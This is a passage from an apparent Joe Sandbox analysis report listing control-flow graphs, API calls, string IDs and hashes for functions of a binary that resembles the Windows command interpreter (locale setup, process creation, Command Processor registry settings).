459->451 465 7ff755cbf170-7ff755cbf17b 460->465 466 7ff755cbf15a-7ff755cbf161 460->466 467 7ff755cbf1b0-7ff755cbf1bb 461->467 468 7ff755cbf19a-7ff755cbf1a1 461->468 471 7ff755cbf1d1-7ff755cbf1db 462->471 469 7ff755cb54b4-7ff755cb54f5 setlocale call 7ff755cb8f80 463->469 470 7ff755cbf207-7ff755cbf20e 463->470 464->453 464->459 465->456 466->465 472 7ff755cbf163-7ff755cbf16e 466->472 467->462 468->467 473 7ff755cbf1a3-7ff755cbf1ae 468->473 477 7ff755cbf211-7ff755cbf21b 470->477 475 7ff755cbf1f3-7ff755cbf1fe 471->475 476 7ff755cbf1dd-7ff755cbf1e4 471->476 472->460 472->465 473->461 473->467 475->470 476->475 479 7ff755cbf1e6-7ff755cbf1f1 476->479 480 7ff755cbf233-7ff755cbf23e 477->480 481 7ff755cbf21d-7ff755cbf224 477->481 479->471 479->475 481->480 482 7ff755cbf226-7ff755cbf231 481->482 482->477 482->480
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: InfoLocale$DefaultUsersetlocale
                                      • String ID: .OCP$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
                                      • API String ID: 1351325837-2236139042
                                      • Opcode ID: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                      • Instruction ID: 9fac823f83673bf4297bfa265f0e0e737c13d808f698f67aa97ed36ac6030f74
                                      • Opcode Fuzzy Hash: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                      • Instruction Fuzzy Hash: 3DF138BAB0868385EE51AF15E9102B9B3A4BF45F98FD84135CA0D577A4EF3CE905C320
                                      Function 00007FF755CB4224 Relevance: 45.8, APIs: 19, Strings: 7, Instructions: 328threadprocessstringCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 483 7ff755cb4224-7ff755cb42a5 InitializeProcThreadAttributeList 484 7ff755cbecd4-7ff755cbecee GetLastError call 7ff755cc9eec 483->484 485 7ff755cb42ab-7ff755cb42e5 UpdateProcThreadAttribute 483->485 492 7ff755cbed1e 484->492 487 7ff755cbecf0-7ff755cbed19 GetLastError call 7ff755cc9eec DeleteProcThreadAttributeList 485->487 488 7ff755cb42eb-7ff755cb43c6 memset * 2 GetStartupInfoW call 7ff755cb3a90 call 7ff755cab900 485->488 487->492 497 7ff755cb4638-7ff755cb4644 _local_unwind 488->497 498 7ff755cb43cc-7ff755cb43d3 488->498 499 7ff755cb4649-7ff755cb4650 497->499 498->499 500 7ff755cb43d9-7ff755cb43dc 498->500 499->500 501 7ff755cb4656-7ff755cb465d 499->501 502 7ff755cb4415-7ff755cb4424 call 7ff755cb5a68 500->502 503 7ff755cb43de-7ff755cb43f5 wcsrchr 500->503 501->502 505 7ff755cb4663 501->505 510 7ff755cb4589-7ff755cb4590 502->510 511 7ff755cb442a-7ff755cb4486 CreateProcessW 502->511 503->502 504 7ff755cb43f7-7ff755cb440f lstrcmpW 503->504 504->502 507 7ff755cb4668-7ff755cb466d call 7ff755cc9044 504->507 505->500 507->502 510->511 514 7ff755cb4596-7ff755cb45fa CreateProcessAsUserW 510->514 513 7ff755cb448b-7ff755cb448f 511->513 515 7ff755cb4672-7ff755cb4682 GetLastError 513->515 516 7ff755cb4495-7ff755cb44c7 CloseHandle call 7ff755cb498c 513->516 514->513 518 7ff755cb468d-7ff755cb4694 515->518 516->518 522 7ff755cb44cd-7ff755cb44e5 516->522 520 7ff755cb46a2-7ff755cb46ac 518->520 521 7ff755cb4696-7ff755cb46a0 518->521 523 7ff755cb46ae-7ff755cb46b5 call 7ff755cb97bc 520->523 526 7ff755cb4705-7ff755cb4707 520->526 521->520 521->523 524 7ff755cb47a3-7ff755cb47a9 522->524 525 7ff755cb44eb-7ff755cb44f2 522->525 541 7ff755cb4703 523->541 542 7ff755cb46b7-7ff755cb4701 call 7ff755cfc038 523->542 528 7ff755cb45ff-7ff755cb4607 525->528 529 7ff755cb44f8-7ff755cb4507 525->529 526->522 527 7ff755cb470d-7ff755cb472a call 7ff755cacd90 526->527 543 7ff755cb473d-7ff755cb4767 call 7ff755cb13e0 call 7ff755cc9eec call 7ff755caff70 _local_unwind 527->543 544 7ff755cb472c-7ff755cb4738 _local_unwind 527->544 528->529 532 7ff755cb460d 528->532 533 7ff755cb4612-7ff755cb4616 529->533 534 7ff755cb450d-7ff755cb4553 call 7ff755cb5cb4 call 7ff755cb33f0 call 7ff755cb498c 529->534 537 7ff755cb476c-7ff755cb4773 532->537 539 7ff755cb47d7-7ff755cb47df 533->539 540 7ff755cb461c-7ff755cb4633 533->540 564 7ff755cb4558-7ff755cb455e 534->564 537->529 548 7ff755cb4779-7ff755cb4780 537->548 545 7ff755cb47e1-7ff755cb47ed CloseHandle 539->545 546 7ff755cb47f2-7ff755cb483c call 7ff755caff70 DeleteProcThreadAttributeList call 7ff755cb8f80 539->546 540->546 541->526 542->526 543->537 544->543 545->546 548->529 550 7ff755cb4786-7ff755cb4789 548->550 550->529 556 7ff755cb478f-7ff755cb4792 550->556 556->524 560 7ff755cb4794-7ff755cb479d call 7ff755cca250 556->560 560->524 560->529 567 7ff755cb4564-7ff755cb4579 call 7ff755cb498c 564->567 568 7ff755cb47ae-7ff755cb47ca call 7ff755cb33f0 564->568 567->546 576 7ff755cb457f-7ff755cb4584 call 7ff755cca920 567->576 568->539 576->546
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: AttributeProcThread$List$CloseCreateDeleteErrorHandleLastProcessmemsetwcsrchr$InfoInitializeStartupUpdateUser_local_unwind_wcsnicmplstrcmp
                                      • String ID: %01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$\XCOPY.EXE$h
                                      • API String ID: 388421343-2905461000
                                      • Opcode ID: 55d34b9fbbbe98a267e2a1b689c77e543e9d7ab297a27b4d624c1a5c7cdf6f16
                                      • Instruction ID: 40d428850cb47206035b04ae96e73c262031e91a8afa3d716a7acea031b48001
                                      • Opcode Fuzzy Hash: 55d34b9fbbbe98a267e2a1b689c77e543e9d7ab297a27b4d624c1a5c7cdf6f16
                                      • Instruction Fuzzy Hash: 55F14FBBA0CA8385EA60AB11E4907B9F7A5FB85F98FC84135D94D46754DF3CE844CB20
                                      Function 00007FF755CB5554 Relevance: 45.8, APIs: 18, Strings: 8, Instructions: 295registryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 579 7ff755cb5554-7ff755cb55b9 call 7ff755cba640 582 7ff755cb55bc-7ff755cb55e8 RegOpenKeyExW 579->582 583 7ff755cb5887-7ff755cb588e 582->583 584 7ff755cb55ee-7ff755cb5631 RegQueryValueExW 582->584 583->582 587 7ff755cb5894-7ff755cb58db time srand call 7ff755cb8f80 583->587 585 7ff755cbf248-7ff755cbf24d 584->585 586 7ff755cb5637-7ff755cb5675 RegQueryValueExW 584->586 591 7ff755cbf260-7ff755cbf265 585->591 592 7ff755cbf24f-7ff755cbf25b 585->592 588 7ff755cb5677-7ff755cb567c 586->588 589 7ff755cb568e-7ff755cb56cc RegQueryValueExW 586->589 594 7ff755cb5682-7ff755cb5687 588->594 595 7ff755cbf28b-7ff755cbf290 588->595 596 7ff755cb56d2-7ff755cb5710 RegQueryValueExW 589->596 597 7ff755cbf2b6-7ff755cbf2bb 589->597 591->586 593 7ff755cbf26b-7ff755cbf286 _wtol 591->593 592->586 593->586 594->589 595->589 599 7ff755cbf296-7ff755cbf2b1 _wtol 595->599 602 7ff755cb5712-7ff755cb5717 596->602 603 7ff755cb5729-7ff755cb5767 RegQueryValueExW 596->603 600 7ff755cbf2ce-7ff755cbf2d3 597->600 601 7ff755cbf2bd-7ff755cbf2c9 597->601 599->589 600->596 604 7ff755cbf2d9-7ff755cbf2f4 _wtol 600->604 601->596 605 7ff755cbf2f9-7ff755cbf2fe 602->605 606 7ff755cb571d-7ff755cb5722 602->606 607 7ff755cb579f-7ff755cb57dd RegQueryValueExW 603->607 608 7ff755cb5769-7ff755cb576e 603->608 604->596 605->603 611 7ff755cbf304-7ff755cbf31a wcstol 605->611 606->603 609 7ff755cb57e3-7ff755cb57e8 607->609 610 7ff755cbf3a9 607->610 612 7ff755cbf320-7ff755cbf325 608->612 613 7ff755cb5774-7ff755cb578f 608->613 614 7ff755cbf363-7ff755cbf368 609->614 615 7ff755cb57ee-7ff755cb5809 609->615 624 7ff755cbf3b5-7ff755cbf3b8 610->624 611->612 616 7ff755cbf327-7ff755cbf33f wcstol 612->616 617 7ff755cbf34b 612->617 618 7ff755cb5795-7ff755cb5799 613->618 619 7ff755cbf357-7ff755cbf35e 613->619 620 7ff755cbf36a-7ff755cbf382 wcstol 614->620 621 7ff755cbf38e 614->621 622 7ff755cb580f-7ff755cb5813 615->622 623 7ff755cbf39a-7ff755cbf39d 615->623 616->617 617->619 618->607 618->619 619->607 620->621 621->623 622->623 625 7ff755cb5819-7ff755cb5823 622->625 623->610 626 7ff755cbf3be-7ff755cbf3c5 624->626 627 7ff755cb582c 624->627 625->624 628 7ff755cb5829 625->628 629 7ff755cb5832-7ff755cb5870 RegQueryValueExW 626->629 627->629 630 7ff755cbf3ca-7ff755cbf3d1 627->630 628->627 631 7ff755cb5876-7ff755cb5882 RegCloseKey 629->631 632 7ff755cbf3dd-7ff755cbf3e2 629->632 630->632 631->583 633 7ff755cbf3e4-7ff755cbf412 ExpandEnvironmentStringsW 632->633 634 7ff755cbf433-7ff755cbf439 632->634 636 7ff755cbf414-7ff755cbf426 call 7ff755cb13e0 633->636 637 7ff755cbf428 633->637 634->631 635 7ff755cbf43f-7ff755cbf44c call 7ff755cab900 634->635 635->631 639 7ff755cbf42e 636->639 637->639 639->634
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: QueryValue$CloseOpensrandtime
                                      • String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor
                                      • API String ID: 145004033-3846321370
                                      • Opcode ID: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                      • Instruction ID: 96d392af58282d8b8357ef85d955c4ce233eec4dff2496abd7491d3cd07ee5d1
                                      • Opcode Fuzzy Hash: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                      • Instruction Fuzzy Hash: E8E194BB92C683C6E790AB10E45017AF7A0FB89F59FC85135EA8E42A54DF7CD544CB20
                                      Function 00007FF755CB37D8 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 269registrythreadmemoryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 821 7ff755cb37d8-7ff755cb3887 GetCurrentThreadId OpenThread call 7ff755cb04f4 HeapSetInformation RegOpenKeyExW 824 7ff755cbe9f8-7ff755cbea3b RegQueryValueExW RegCloseKey 821->824 825 7ff755cb388d-7ff755cb38eb call 7ff755cb5920 GetConsoleOutputCP GetCPInfo 821->825 827 7ff755cbea41-7ff755cbea59 GetThreadLocale 824->827 825->827 831 7ff755cb38f1-7ff755cb3913 memset 825->831 829 7ff755cbea74-7ff755cbea77 827->829 830 7ff755cbea5b-7ff755cbea67 827->830 834 7ff755cbea94-7ff755cbea96 829->834 835 7ff755cbea79-7ff755cbea7d 829->835 830->829 832 7ff755cbeaa5 831->832 833 7ff755cb3919-7ff755cb3935 call 7ff755cb4d5c 831->833 838 7ff755cbeaa8-7ff755cbeab4 832->838 841 7ff755cbeae2-7ff755cbeaff call 7ff755ca3240 call 7ff755cc8530 call 7ff755cb4c1c 833->841 842 7ff755cb393b-7ff755cb3942 833->842 834->832 835->834 837 7ff755cbea7f-7ff755cbea89 835->837 837->834 838->833 840 7ff755cbeaba-7ff755cbeac3 838->840 843 7ff755cbeacb-7ff755cbeace 840->843 850 7ff755cbeb00-7ff755cbeb0d 841->850 845 7ff755cbeb27-7ff755cbeb40 _setjmp 842->845 846 7ff755cb3948-7ff755cb3962 _setjmp 842->846 847 7ff755cbead0-7ff755cbeadb 843->847 848 7ff755cbeac5-7ff755cbeac9 843->848 852 7ff755cbeb46-7ff755cbeb49 845->852 853 7ff755cb39fe-7ff755cb3a05 call 7ff755cb4c1c 845->853 846->850 851 7ff755cb3968-7ff755cb396d 846->851 847->838 854 7ff755cbeadd 847->854 848->843 866 7ff755cbeb15-7ff755cbeb1f call 7ff755cb4c1c 850->866 856 7ff755cb396f 851->856 857 7ff755cb39b9-7ff755cb39bb 851->857 859 7ff755cbeb66-7ff755cbeb6f call 7ff755cb01b8 852->859 860 7ff755cbeb4b-7ff755cbeb65 call 7ff755ca3240 call 7ff755cc8530 call 7ff755cb4c1c 852->860 853->824 854->833 867 7ff755cb3972-7ff755cb397d 856->867 862 7ff755cb39c1-7ff755cb39c3 call 7ff755cb4c1c 857->862 863 7ff755cbeb20 857->863 880 7ff755cbeb71-7ff755cbeb82 _setmode 859->880 881 7ff755cbeb87-7ff755cbeb89 call 7ff755cb86f0 859->881 860->859 877 7ff755cb39c8 862->877 863->845 866->863 874 7ff755cb397f-7ff755cb3984 867->874 875 7ff755cb39c9-7ff755cb39de call 7ff755cadf60 867->875 874->867 883 7ff755cb3986-7ff755cb39ae call 7ff755cb0580 GetConsoleOutputCP GetCPInfo call 7ff755cb04f4 874->883 875->866 889 7ff755cb39e4-7ff755cb39e8 875->889 877->875 880->881 890 7ff755cbeb8e-7ff755cbebad call 7ff755cb58e4 call 7ff755cadf60 881->890 898 7ff755cb39b3 883->898 889->853 893 7ff755cb39ea-7ff755cb39ef call 7ff755cabe00 889->893 902 7ff755cbebaf-7ff755cbebb3 890->902 899 7ff755cb39f4-7ff755cb39fc 893->899 898->857 899->874 902->853 903 7ff755cbebb9-7ff755cbec24 call 7ff755cb58e4 GetConsoleOutputCP GetCPInfo call 7ff755cb04f4 call 7ff755cabe00 call 7ff755cb0580 GetConsoleOutputCP GetCPInfo call 7ff755cb04f4 902->903 903->890
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: QueryThread$ConsoleInfoOpenOutputVirtual$CloseCurrentHeapInformationLocaleValue_setjmpmemset
                                      • String ID: DisableCMD$Software\Policies\Microsoft\Windows\System
                                      • API String ID: 2624720099-1920437939
                                      • Opcode ID: 8dcb79cde60ee5e49f11697ed5384324bb8acc00ab40d250c7b11be42b6fa51b
                                      • Instruction ID: 947aa4185e6d32f6ed324634c37020d85f0884062df1c32d718c5c27077101e6
                                      • Opcode Fuzzy Hash: 8dcb79cde60ee5e49f11697ed5384324bb8acc00ab40d250c7b11be42b6fa51b
                                      • Instruction Fuzzy Hash: 87C182BBE086838AF754BB6098501B8FBA1EF45F6CFCC4139D90E57691DE3CA8458660
                                      Function 00007FF755CB823C Relevance: 15.1, APIs: 10, Instructions: 116COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1118 7ff755cb823c-7ff755cb829b FindFirstFileExW 1119 7ff755cb82cd-7ff755cb82df 1118->1119 1120 7ff755cb829d-7ff755cb82a9 GetLastError 1118->1120 1124 7ff755cb8365-7ff755cb837b FindNextFileW 1119->1124 1125 7ff755cb82e5-7ff755cb82ee 1119->1125 1121 7ff755cb82af 1120->1121 1122 7ff755cb82b1-7ff755cb82cb 1121->1122 1126 7ff755cb83d0-7ff755cb83e5 FindClose 1124->1126 1127 7ff755cb837d-7ff755cb8380 1124->1127 1128 7ff755cb82f1-7ff755cb82f4 1125->1128 1126->1128 1127->1119 1129 7ff755cb8386 1127->1129 1130 7ff755cb82f6-7ff755cb8300 1128->1130 1131 7ff755cb8329-7ff755cb832b 1128->1131 1129->1120 1133 7ff755cb8332-7ff755cb8353 GetProcessHeap HeapAlloc 1130->1133 1134 7ff755cb8302-7ff755cb830e 1130->1134 1131->1121 1132 7ff755cb832d 1131->1132 1132->1120 1135 7ff755cb8356-7ff755cb8363 1133->1135 1136 7ff755cb8310-7ff755cb8313 1134->1136 1137 7ff755cb838b-7ff755cb83c2 GetProcessHeap HeapReAlloc 1134->1137 1135->1136 1138 7ff755cb8315-7ff755cb8323 1136->1138 1139 7ff755cb8327 1136->1139 1140 7ff755cc50f8-7ff755cc511e GetLastError FindClose 1137->1140 1141 7ff755cb83c8-7ff755cb83ce 1137->1141 1138->1139 1139->1131 1140->1122 1141->1135
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: ErrorFileFindFirstLast
                                      • String ID:
                                      • API String ID: 873889042-0
                                      • Opcode ID: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                      • Instruction ID: 898cbbf6f98cefebe8f76a33f97193f8dc682c7c4905a5e9254f387ea2a84903
                                      • Opcode Fuzzy Hash: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                      • Instruction Fuzzy Hash: D75129BBA09B8386EB40AB11E544179BBA0FB4AF99FCD9135CA1D43390DF3CE4548760
                                      Function 00007FF755CB2978 Relevance: 9.1, APIs: 6, Instructions: 138COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1142 7ff755cb2978-7ff755cb29b6 1143 7ff755cb29b9-7ff755cb29c1 1142->1143 1143->1143 1144 7ff755cb29c3-7ff755cb29c5 1143->1144 1145 7ff755cbe441 1144->1145 1146 7ff755cb29cb-7ff755cb29cf 1144->1146 1147 7ff755cb29d2-7ff755cb29da 1146->1147 1148 7ff755cb2a1e-7ff755cb2a3e FindFirstFileW 1147->1148 1149 7ff755cb29dc-7ff755cb29e1 1147->1149 1151 7ff755cbe435-7ff755cbe439 1148->1151 1152 7ff755cb2a44-7ff755cb2a5c FindClose 1148->1152 1149->1148 1150 7ff755cb29e3-7ff755cb29eb 1149->1150 1150->1147 1153 7ff755cb29ed-7ff755cb2a1c call 7ff755cb8f80 1150->1153 1151->1145 1154 7ff755cb2a62-7ff755cb2a6e 1152->1154 1155 7ff755cb2ae3-7ff755cb2ae5 1152->1155 1157 7ff755cb2a70-7ff755cb2a78 1154->1157 1158 7ff755cbe3f7-7ff755cbe3ff 1155->1158 1159 7ff755cb2aeb-7ff755cb2b10 _wcsnicmp 1155->1159 1157->1157 1162 7ff755cb2a7a-7ff755cb2a8d 1157->1162 1159->1154 1160 7ff755cb2b16-7ff755cbe3f1 _wcsicmp 1159->1160 1160->1154 1160->1158 1162->1145 1164 7ff755cb2a93-7ff755cb2a97 1162->1164 1165 7ff755cbe404-7ff755cbe407 1164->1165 1166 7ff755cb2a9d-7ff755cb2ade memmove call 7ff755cb13e0 1164->1166 1167 7ff755cbe40b-7ff755cbe413 1165->1167 1166->1150 1167->1167 1169 7ff755cbe415-7ff755cbe42b memmove 1167->1169 1169->1151
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                      • Instruction ID: d37bc348147a46ae2b29eba4e16fcb82bf632852541d90978184de6b273c6774
                                      • Opcode Fuzzy Hash: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                      • Instruction Fuzzy Hash: 185116A7F0868385EA30AB5599442BAE390FB45FB8FCC5230DE6E476D0DF3CE8418610
                                      Function 00007FF755CB4D5C Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 268memorylibraryloaderCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 643 7ff755cb4d5c-7ff755cb4e4b InitializeCriticalSection call 7ff755cb58e4 SetConsoleCtrlHandler _get_osfhandle GetConsoleMode _get_osfhandle GetConsoleMode call 7ff755cb0580 call 7ff755cb4a14 call 7ff755cb4ad0 call 7ff755cb5554 GetCommandLineW 654 7ff755cb4e4d-7ff755cb4e54 643->654 654->654 655 7ff755cb4e56-7ff755cb4e61 654->655 656 7ff755cb51cf-7ff755cb51e3 call 7ff755ca3278 call 7ff755cb4c1c 655->656 657 7ff755cb4e67-7ff755cb4e7b call 7ff755cb2e44 655->657 662 7ff755cb4e81-7ff755cb4ec3 GetCommandLineW call 7ff755cb13e0 call 7ff755caca40 657->662 663 7ff755cb51ba-7ff755cb51ce call 7ff755ca3278 call 7ff755cb4c1c 657->663 662->663 674 7ff755cb4ec9-7ff755cb4ee8 call 7ff755cb417c call 7ff755cb2394 662->674 663->656 678 7ff755cb4eed-7ff755cb4ef5 674->678 678->678 679 7ff755cb4ef7-7ff755cb4f1f call 7ff755caaa54 678->679 682 7ff755cb4f21-7ff755cb4f30 679->682 683 7ff755cb4f95-7ff755cb4fee GetConsoleOutputCP GetCPInfo call 7ff755cb51ec GetProcessHeap HeapAlloc 679->683 682->683 684 7ff755cb4f32-7ff755cb4f39 682->684 689 7ff755cb5012-7ff755cb5018 683->689 690 7ff755cb4ff0-7ff755cb5006 GetConsoleTitleW 683->690 684->683 686 7ff755cb4f3b-7ff755cb4f77 call 7ff755ca3278 GetWindowsDirectoryW 684->686 695 7ff755cb51b1-7ff755cb51b9 call 7ff755cb4c1c 686->695 696 7ff755cb4f7d-7ff755cb4f90 call 7ff755cb3c24 686->696 693 7ff755cb507a-7ff755cb507e 689->693 694 7ff755cb501a-7ff755cb5024 call 7ff755cb3578 689->694 690->689 692 7ff755cb5008-7ff755cb500f 690->692 692->689 697 7ff755cb5080-7ff755cb50b3 call 7ff755ccb89c call 7ff755ca586c call 7ff755ca3240 call 7ff755cb3448 693->697 698 7ff755cb50eb-7ff755cb5161 GetModuleHandleW GetProcAddress * 3 693->698 694->693 710 7ff755cb5026-7ff755cb5030 694->710 695->663 696->683 724 7ff755cb50d2-7ff755cb50d7 call 7ff755ca3278 697->724 725 7ff755cb50b5-7ff755cb50d0 call 7ff755cb3448 * 2 697->725 702 7ff755cb516f 698->702 703 7ff755cb5163-7ff755cb5167 698->703 709 7ff755cb5172-7ff755cb51af free call 7ff755cb8f80 702->709 703->702 708 7ff755cb5169-7ff755cb516d 703->708 708->702 708->709 711 7ff755cb5032-7ff755cb5059 GetStdHandle GetConsoleScreenBufferInfo 710->711 712 7ff755cb5075 call 7ff755cccff0 710->712 715 7ff755cb5069-7ff755cb5073 711->715 716 7ff755cb505b-7ff755cb5067 711->716 712->693 715->693 715->712 716->693 729 7ff755cb50dc-7ff755cb50e6 GlobalFree 724->729 725->729 729->698
                                      APIs
                                      • InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB4D9A
                                        • Part of subcall function 00007FF755CB58E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF755CCC6DB), ref: 00007FF755CB58EF
                                      • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB4DBB
                                      • _get_osfhandle.MSVCRT ref: 00007FF755CB4DCA
                                      • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB4DE0
                                      • _get_osfhandle.MSVCRT ref: 00007FF755CB4DEE
                                      • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB4E04
                                        • Part of subcall function 00007FF755CB0580: _get_osfhandle.MSVCRT ref: 00007FF755CB0589
                                        • Part of subcall function 00007FF755CB0580: SetConsoleMode.KERNELBASE ref: 00007FF755CB059E
                                        • Part of subcall function 00007FF755CB0580: _get_osfhandle.MSVCRT ref: 00007FF755CB05AF
